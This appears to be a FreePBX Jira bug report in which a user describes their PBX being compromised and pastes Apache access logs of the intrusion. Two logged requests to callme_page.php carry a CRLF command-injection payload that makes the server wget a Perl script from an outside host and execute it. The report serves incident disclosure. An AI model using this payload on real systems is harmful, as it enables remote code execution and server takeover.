Uploaded image for project: 'FreePBX'
  1. FreePBX
  2. FREEPBX-5845

my system was compromized

    XMLWordPrintable

    Details

    • Type: Bug
    • Status: Closed
    • Resolution: Not an issue
    • Affects Version/s: 2.9
    • Fix Version/s: None
    • Component/s: ARI User Portal
    • Labels:
      None

      Description

      yesterday my system was compromised: phpshell scipt added to

      /var/www/localhost/htdocs/recordings/main.php

      apache log information:

      {noformat}
      37.8.21.40 - - [21/May/2012:08:54:36 +0400] "GET /recordings/ HTTP/1.1" 200 5293
      37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/main.css HTTP/1.1" 200 184
      37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/logo.png HTTP/1.1" 200 8049
      37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/navigation.css HTTP/1.1" 200 2404
      37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/spacer.gif HTTP/1.1" 200 43
      37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/global.css HTTP/1.1" 200 1354
      37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/text.css HTTP/1.1" 200 61
      37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/layout.css HTTP/1.1" 200 6043
      37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/header.css HTTP/1.1" 200 1146
      37.8.21.40 - - [21/May/2012:08:54:38 +0400] "GET /recordings/theme/iefixes.css HTTP/1.1" 200 283
      37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/js/libfreepbx.javascripts.js HTTP/1.1" 200 302944
      37.8.21.40 - - [21/May/2012:08:54:46 +0400] "GET /favicon.ico HTTP/1.1" 404 209
      37.8.21.40 - - [21/May/2012:08:55:06 +0400] "GET /admin HTTP/1.1" 301 235
      37.8.21.40 - - [21/May/2012:08:55:06 +0400] "GET /admin/ HTTP/1.1" 302 -
      37.8.21.40 - - [21/May/2012:08:55:06 +0400] "GET /admin/config.php HTTP/1.1" 401 3034
      37.8.21.40 - freepbx [21/May/2012:08:55:20 +0400] "GET /admin/config.php HTTP/1.1" 401 3034
      37.8.21.40 - admin [21/May/2012:08:55:26 +0400] "GET /admin/config.php HTTP/1.1" 401 3034
      37.8.21.40 - - [21/May/2012:08:55:30 +0400] "GET /admin/common/script.js.php?load_version=2.9.0.10 HTTP/1.1" 200 1111
      37.8.21.40 - - [21/May/2012:08:55:31 +0400] "GET /admin/assets/js/jquery.cookie.js HTTP/1.1" 200 4247
      37.8.21.40 - - [21/May/2012:08:55:30 +0400] "GET /admin/common/mainstyle.css?load_version=2.9.0.10 HTTP/1.1" 200 15911
      37.8.21.40 - - [21/May/2012:08:55:31 +0400] "GET /admin/assets/js/jquery.toggleval.3.0.js HTTP/1.1" 200 3496
      37.8.21.40 - - [21/May/2012:08:55:31 +0400] "GET /admin/assets/js/interface.dim.js HTTP/1.1" 200 3761
      37.8.21.40 - - [21/May/2012:08:55:31 +0400] "GET /admin/assets/js/script.legacy.js HTTP/1.1" 200 19594
      37.8.21.40 - - [21/May/2012:08:55:31 +0400] "GET /admin/assets/js/jquery.dimensions.js HTTP/1.1" 200 20547
      37.8.21.40 - - [21/May/2012:08:55:32 +0400] "GET /admin/assets/js/tabber-minimized.js HTTP/1.1" 200 4904
      37.8.21.40 - - [21/May/2012:08:55:31 +0400] "GET /admin/assets/js/jquery-ui-1.8.x.min.js HTTP/1.1" 200 198688
      37.8.21.40 - - [21/May/2012:08:55:30 +0400] "GET /admin/assets/js/jquery-1.4.x.min.js HTTP/1.1" 200 78696
      37.8.21.40 - - [21/May/2012:08:55:32 +0400] "GET /admin/images/favicon.ico HTTP/1.1" 200 318
      37.8.21.40 - - [21/May/2012:09:00:21 +0400] "GET /admin/ HTTP/1.1" 302 -
      37.8.21.40 - - [21/May/2012:09:00:21 +0400] "GET /admin/config.php HTTP/1.1" 401 3034
      37.8.21.40 - freepbx [21/May/2012:09:00:29 +0400] "GET /admin/config.php HTTP/1.1" 401 3034
      37.8.21.40 - admin [21/May/2012:09:00:34 +0400] "GET /admin/config.php HTTP/1.1" 401 3034
      37.8.21.40 - admin [21/May/2012:09:00:45 +0400] "GET /admin/config.php HTTP/1.1" 401 3034
      37.8.21.40 - - [21/May/2012:09:00:46 +0400] "GET /admin/common/mainstyle.css?load_version=2.9.0.10 HTTP/1.1" 200 15911
      37.8.21.40 - - [21/May/2012:09:00:47 +0400] "GET /admin/assets/js/script.legacy.js HTTP/1.1" 200 19594
      37.8.21.40 - - [21/May/2012:09:00:47 +0400] "GET /admin/assets/js/jquery.dimensions.js HTTP/1.1" 200 20547
      37.8.21.40 - - [21/May/2012:09:00:50 +0400] "GET /admin/images/freepbx_large.png?load_version=2.9.0.10 HTTP/1.1" 200 7590
      37.8.21.40 - - [21/May/2012:09:00:50 +0400] "GET /admin/images/logo.png?load_version=2.9.0.10 HTTP/1.1" 200 5699
      37.8.21.40 - - [21/May/2012:09:00:51 +0400] "GET /panel HTTP/1.1" 401 401
      37.8.21.40 - - [21/May/2012:09:00:47 +0400] "GET /admin/assets/js/jquery-1.4.x.min.js HTTP/1.1" 200 78696
      37.8.21.40 - - [21/May/2012:09:00:47 +0400] "GET /admin/assets/js/jquery-ui-1.8.x.min.js HTTP/1.1" 200 198688
      37.8.21.40 - - [21/May/2012:09:20:50 +0400] "GET /recordings/misc/callme_page.php?action=c&callmenum=*011@from-internal/n%250D%250AApplication:%2520system%250D%250AData:%2520wget%2520http://109.169.37.143/a/dcm.txt%2520-O%2520/tmp/back.txt%3bperl%2520/tmp/back.txt%250D%250A%250D%250A HTTP/1.1" 200 1155
      37.8.21.40 - - [21/May/2012:09:20:51 +0400] "GET /recordings/theme/main.css HTTP/1.1" 200 184
      37.8.21.40 - - [21/May/2012:09:20:51 +0400] "GET /recordings/theme/global.css HTTP/1.1" 200 1354
      37.8.21.40 - - [21/May/2012:09:20:52 +0400] "GET /recordings/theme/iefixes.css HTTP/1.1" 200 283
      37.8.21.40 - - [21/May/2012:09:20:52 +0400] "GET /recordings/theme/layout.css HTTP/1.1" 200 6043
      37.8.21.40 - - [21/May/2012:09:20:52 +0400] "GET /recordings/theme/navigation.css HTTP/1.1" 200 2404
      37.8.21.40 - - [21/May/2012:09:20:52 +0400] "GET /recordings/theme/header.css HTTP/1.1" 200 1146
      37.8.21.40 - - [21/May/2012:09:20:55 +0400] "GET /recordings/theme/text.css HTTP/1.1" 200 61
      37.8.21.40 - - [21/May/2012:09:20:55 +0400] "GET /favicon.ico HTTP/1.1" 404 209
      37.8.21.40 - - [21/May/2012:09:20:56 +0400] "GET /favicon.ico HTTP/1.1" 404 209
      37.8.21.40 - - [21/May/2012:09:20:56 +0400] "GET /favicon.ico HTTP/1.1" 404 209
      37.8.21.40 - - [21/May/2012:09:21:00 +0400] "GET /recordings/misc/callme_page.php?action=c&callmenum=*011@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20wget%20http://109.169.37.143/a/dcm.txt%20-O%20/tmp/back.txt;perl%20/tmp/back.txt%0D%0A%0D%0A HTTP/1.1" 200 1127
      37.8.21.40 - - [21/May/2012:09:21:27 +0400] "GET /recordings/main.php HTTP/1.1" 404 217{noformat}

      my system: Gentoo, FreePBX 2.9.0.10

        Gliffy Diagrams

          Attachments

            Activity

              People

              • Assignee:
                Unassigned
                Reporter:
                a0d75 a0d75
              • Votes:
                0 Vote for this issue
                Watchers:
                0 Start watching this issue

                Dates

                • Created:
                  Updated:
                  Resolved:

                  NextupJiraPlusStatus

                  Error rendering 'slack.nextup.jira:nextup-jira-plus-status'. Please contact your Jira administrators.